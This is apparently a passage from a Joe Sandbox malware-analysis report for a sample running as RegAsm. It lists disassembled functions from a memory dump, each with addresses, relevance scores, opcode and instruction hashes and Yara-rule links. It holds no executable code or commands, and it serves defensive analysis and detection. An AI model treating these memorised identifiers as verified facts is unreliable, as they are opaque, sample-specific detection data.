Function 00417380 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

?^A, xrefs: 00417450, 00417540

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: ?^A
API String ID: 2994545307-4120214115
Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F

Function 004236E2 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

6B, xrefs: 004236D0

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 6B
API String ID: 0-4127139157
Opcode ID: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
Instruction ID: 96ac195b9b02395a12e3507be26d084a31814086cf7b4e33e8fc611c97ddc8d1
Opcode Fuzzy Hash: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
Instruction Fuzzy Hash: 90416A79A05102CFE708CF68EC917A9B3B2FF8A311F5A45B8D545E7390CB74A951CB48

Function 00428B61 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

$%, xrefs: 00428C20

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $%
API String ID: 0-4214564638
Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64

Function 0041682D Relevance: .8, Instructions: 761COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c893c65e03af5ed3381c551886126d2ea28dea69d32e62726fdedb8c1a906dc
Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
Opcode Fuzzy Hash: 7c893c65e03af5ed3381c551886126d2ea28dea69d32e62726fdedb8c1a906dc
Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A

Function 00402F50 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
Instruction ID: 46ead43bd988ad5b99a16a21c2ab1060e4939541d0428d2c05e05470f57672f5
Opcode Fuzzy Hash: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
Instruction Fuzzy Hash: 2C52E1715083458FCB14CF18C0806AABFE1FF89305F18897EE8996B391D778E949CB89

Function 00406710 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
Instruction ID: 42a8754500a030df467a19eb208a6b75f213c456a02a9d9f5179d7aa03d033db
Opcode Fuzzy Hash: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
Instruction Fuzzy Hash: B952E3B0A08B949FE730CB24C4843A7BBE1AB91314F15483FD5D756BC2C27DB9958B0A

Function 004074F0 Relevance: .6, Instructions: 611COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
Instruction ID: 7b72874d185f9504f09fa30b763c2e13130ca022e31a023e0d3144396e745bed
Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
Instruction Fuzzy Hash: 1012A372A0C7118BD725DE18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87

Function 0041148F Relevance: .6, Instructions: 607COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c09ab01705470a57d5ac0deba44fab8d122be945ed84d36d91023274058ae07e
Instruction ID: 819cfa75d40707277b7651a3d059055683ccfe715dfab14305db8651ec0ec7a0
Opcode Fuzzy Hash: c09ab01705470a57d5ac0deba44fab8d122be945ed84d36d91023274058ae07e
Instruction Fuzzy Hash: 8C32E6B5A04B408FD714DF38C5953AABBE1AF45310F188A3ED5EB873D2E638A445CB06

Function 00403970 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d327358085ba1a993c9adccc0f3e0ff780f208ec349b024e73061d52e6553d9c
Instruction ID: 1c03f4d1d9da4e588b7eb0090f71902aa376377d07fc1d7850242e2290c7d787
Opcode Fuzzy Hash: d327358085ba1a993c9adccc0f3e0ff780f208ec349b024e73061d52e6553d9c
Instruction Fuzzy Hash: 02322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18

Function 004197C2 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786

Function 004291DD Relevance: .5, Instructions: 549COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
Instruction ID: 8cc232c379ab24ad0e8e110b9e0577a2d66b898ca13c535210c4519ca42de900
Opcode Fuzzy Hash: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
Instruction Fuzzy Hash: ACF12771E003258BCF24CF58C8516ABB7B2FF95314F198199D896AF355E7389C41CB94

Function 00405990 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96

Function 00420939 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
Instruction ID: 6af0af9fd07dbea0327a8a302486079f3e258e751aa577ffaaa1b30c4ee5c47c
Opcode Fuzzy Hash: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
Instruction Fuzzy Hash: 5B129D61608BC28ED315CA3C8848756BFD16BA6228F1CC79DD0F94B3D3C27A9546C7A2

Function 00415220 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A

Function 0040EA10 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
Instruction ID: c845803a38f6c77acddbfa9eef1216980ece3764384c33bb2f9187d8778c445e
Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
Instruction Fuzzy Hash: 2BF1C0F0904B40AFC3A5CF3AC942797BEECEB0A360F14491EF5AEC2241D73561458BA6

Function 0041FC75 Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
Instruction ID: 41c3e091da67547de47b3906f8a28cdcf4f9a35dde57214a1a091a27875e02c3
Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
Instruction Fuzzy Hash: F0024861508BC18ED3268B3C8848A56BFD26BA6224F0DC79DD4E94F7E3C279D506C762

Function 00426B95 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9

Function 0043F330 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785

Function 0041DE80 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
Instruction ID: 8a51dd8e2965cc9f0c4013a2f6a7698077ed2e8ce9dcff126952d1e9ceec8530
Opcode Fuzzy Hash: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
Instruction Fuzzy Hash: EFB15579904301AFDB108F25DC41B5ABBE2BFD8314F144A3EF898932A1D776DD668B06

Function 00422190 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A

Function 0043EFB0 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
Instruction ID: 3187122ed07642cbe4dcf9e03264eeaa439871456ea8a6719abbd84e200541cd
Opcode Fuzzy Hash: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
Instruction Fuzzy Hash: 4EA11436A043018BC718DF28D99092BB3F2EBC9710F1A957DE9869B365EB35DC05CB46

Function 00406280 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
Instruction ID: afe5d4654f5e8657962bc42cc500043a3620e9a043509faccf93fb76782c58a6
Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
Instruction Fuzzy Hash: DBC15BB29087418FC360CF28DC96BABB7F1BF85318F09492DD1DAD6242E778A155CB46

Function 0042830D Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
Instruction ID: 652f8e9b795bdad566c10a3835dfc4d237c9f110778e3a4e594c84154d78986c
Opcode Fuzzy Hash: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
Instruction Fuzzy Hash: 43914C72754B1A4BC714DE6CDC9066EB6D2ABD4210F4D423CD8958B3C2EF78AD0587C5

Function 00429C2B Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
Instruction ID: 89cd8c3f6ac805753dcfa7ea52abb159a623b373aaffce4ab273b97bd3830c78
Opcode Fuzzy Hash: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
Instruction Fuzzy Hash: CFB10575608790DFD714DF24E891A2BB7E2EF8A314F488A6DF0D5872A2D7388905CB16

Function 0043AEC0 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
Instruction ID: ba880319810bdb8e213e259538359e713a98a4b2945b2457ae3d4c78796ecc2a
Opcode Fuzzy Hash: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
Instruction Fuzzy Hash: 47512A357043008FE7188F28C89577BB7E2EB9A320F18A62ED5D597392D7389C41C78A

Function 0041DC00 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5610294b30e5e8a679adaf8088138694fc7c481e66a98cc5ba01ae8c02aa6d
Instruction ID: c8e85d340764d3b4d6a043baf240a448254d236dbbdea7acc366692660b189d4
Opcode Fuzzy Hash: 2a5610294b30e5e8a679adaf8088138694fc7c481e66a98cc5ba01ae8c02aa6d
Instruction Fuzzy Hash: C87129B2A042614FC7158E28D84139FBBD1BB95324F18863EE8B9873D2D779C84AD7C1

Function 0041E290 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
Instruction ID: 4c2c0ab1878e9cfa13c7d80eb19278cb3d77386feaf759a830bf0c171a5c4840
Opcode Fuzzy Hash: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
Instruction Fuzzy Hash: 3C613B3A7496C047D3288E3D4C112AABA934BD7230F2CC77EEDF6873E1D56988469355

Function 004385E0 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
Instruction ID: 19c9bc1ea9186e56c23c5e66cc144f5345884b6a785bfb5c303e44cb60fc86fa
Opcode Fuzzy Hash: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
Instruction Fuzzy Hash: 915126746083009BE7109F29DC45B2BB7E6EB89704F14982DF5C597292DB39DC05CBAB

Function 00437500 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
Instruction ID: 583c87d3fd9d435e842b0babbfef0573c90b7f3422fd301491a952917507ab78
Opcode Fuzzy Hash: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
Instruction Fuzzy Hash: 2E516DB15087549FE314DF29D49435BBBE1BBC8318F044E2EE4E987390E379DA088B96

Function 00425E70 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
Instruction ID: 6e37d88637f30dcf1ca5a39760ca9fc235c391d288c19f204446c63a880f3ae7
Opcode Fuzzy Hash: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
Instruction Fuzzy Hash: 0951AE30B483648FD710DA28A480267BBD2DF95320F8A867ED4D44B3D6E67DD90DD389

Function 00436B08 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d04a0d8e38c3f294c211cbf0a89a7ee30207864e8a9f5169d07d9085582a6937
Instruction ID: 1e023c5d0ae8bc499a1476ddf9e588c272e9bef8a9d0e355e0d1dc09bced5273
Opcode Fuzzy Hash: d04a0d8e38c3f294c211cbf0a89a7ee30207864e8a9f5169d07d9085582a6937
Instruction Fuzzy Hash: 03615C31D046A18FDB14CF28C85039DBBF1AB4E310F1AC6AAC859AB391C7799C45DF85

Function 0040CD46 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a270cec9775b927bc727ae391425bd2de1f56668aa53b1f5ee410799ab9563
Instruction ID: d4e59386902d7f076a599dd24da1785c797e999f3f2e44946b1e4a57c50fb419
Opcode Fuzzy Hash: 80a270cec9775b927bc727ae391425bd2de1f56668aa53b1f5ee410799ab9563
Instruction Fuzzy Hash: 13319B33BA87504BD304DB628C886ABE586AFD1764F0D466DE8D4773D2C9B49C0183DD

Function 004286C0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a5542dbed4291c7f0e4c69363a5fae7bd86cdcdd8d89fd126e446a51f24cc8
Instruction ID: f52b03c38bbf71025152a8b77a79184c4a140196803d3bef29f19ac7e076952c
Opcode Fuzzy Hash: 70a5542dbed4291c7f0e4c69363a5fae7bd86cdcdd8d89fd126e446a51f24cc8
Instruction Fuzzy Hash: 2241D2B1E102285FDB24CF788C5279EBAB6EB95300F1181BDD849EB285E7340D468F92

Function 0043D34D Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac257c9c1b75187117c336eb7496787fabe20a4f9f742b947e5c359f3d43b3c
Instruction ID: 24e83879a734b152f463eb7ca99c156da8292c87067313e83d08c5c08021f5dd
Opcode Fuzzy Hash: 3ac257c9c1b75187117c336eb7496787fabe20a4f9f742b947e5c359f3d43b3c
Instruction Fuzzy Hash: 6421F831E083500BD718CF39989116BFBD29BDF224F18D53DD4A697395CA38ED068A49

Function 0041BF14 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
Instruction ID: 2e66319cfaede8187dee7502eb2bdf6532bbee011b37898b3e62ff9ec94ea10c
Opcode Fuzzy Hash: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
Instruction Fuzzy Hash: 2C1166324092905AC314CB289940737BBE19B87310F584A5DF4D6E32E1D728CC028B8A

Function 00435450 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359

Function 0042A700 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E

Function 00428D93 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

